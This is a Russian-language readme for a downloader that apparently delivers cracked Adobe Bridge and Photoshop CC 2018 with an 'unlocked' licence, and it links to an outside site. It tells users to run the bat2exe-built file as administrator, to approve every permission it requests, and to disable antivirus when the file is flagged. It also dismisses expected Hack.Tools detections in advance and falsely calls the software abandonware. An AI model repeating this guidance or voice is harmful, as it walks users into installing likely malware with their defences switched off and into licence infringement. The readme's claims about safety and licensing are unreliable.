Adobe CC 2018 Distributives Download

Данная программа скачивает из Интернета дистрибутивы Adobe Brige CC 2018
(x86 и x64) и Adobe Photoshop CC 2018 x64 в папку %USERPROFILE% (C:«ваш
логин») для последующей оффлайновой установки. При загрузке не
используются торренты или файлоообменники, поддерживается
гарантированная докачка. Вместе с программами скачивается файл с их
хеш-суммами для предотвращения заражения дистрибутивов.

Данные программы работают на операционных системах Microsoft Windows
начиная с версии 7, требуют 3 Гб оперативной памяти и 20 Гбайт дискового
пространства. В настоящее время являются Abandonware. Программы могут
устанавливаться на виртуальные машины с указанными минимальными
требованиями.

Данные версии программ поставляются с разлоченной неограниченной
лицензией, предназначенной только для личного использования.
Коммерческое использование данной лицензии запрещено.

Программа может устанавливать на компьютер дополнительные библиотеки,
необходимые для работы программ. Отнеситесь к этому с пониманием.

Правила использования программы

-   От имени администратора запустите файд LoadAdobeDistrib.exe
-   Во время скачки программы отвечайте утвердительно на все разрешения,
    которые она у Вас спросит
-   В случае, если Вы закрыли окно программы, или его закрыл антивирус
    или фоновывй процесс, отключите его и запустите файл
    LoadAdobeDistrib.exe заново.

Примечание. Указанный файл не показывает процесс загрузки и не 
информирует о его завершении. Об окончании загрузки можно судить
по появлению файлов Install-AdobeDistrib.txt и
Install-AdobeDistrib.txt в каталоге профиля пользователя.

ВНИМАНИЕ!!! Указанный файл изготовлен с помощью программы bat2exe. 
Некоторые параноидальные антивирусы помечают такой файл как unknown malware, 
и удаляют его из системы. Поэтому, если программа всё-таки определяет 
данный файл как вирус, запустите скачку с отключённым антивирусом. 
Данный файл не скачивает рекламного программного обеспечения, автору 
этого не надо, поэтому можете не опасаться за безопасность своего компьютера. 
В скаченных же дистрибувах присутствуют модули лицензирования, которые 
могут определяться антивирусами как Hack.Tools. Смотри файл 
Install-AdobeDistrib.txt

ВНИМАНИЕ!!! Данная программа не предназначена для публикации в открытых
исnочниках или для открытой продажи. Она предназначена только для
внутреннего использования сотрудниками корпорации NIT. Все права на
программу и лицензия на скаченные продукты принадлежит New Internet
Technologies Inc. Отнеситесь к этому с пониманием.

Состав продукта

-   AdobeBridgeCC2018x64.exe
-   AdobeBridgeCC2018x86.exe
-   AdobePhotoshopCC2018x86-x64.exe

Ссылка на скачивание

http://anticriminalonline.ru/
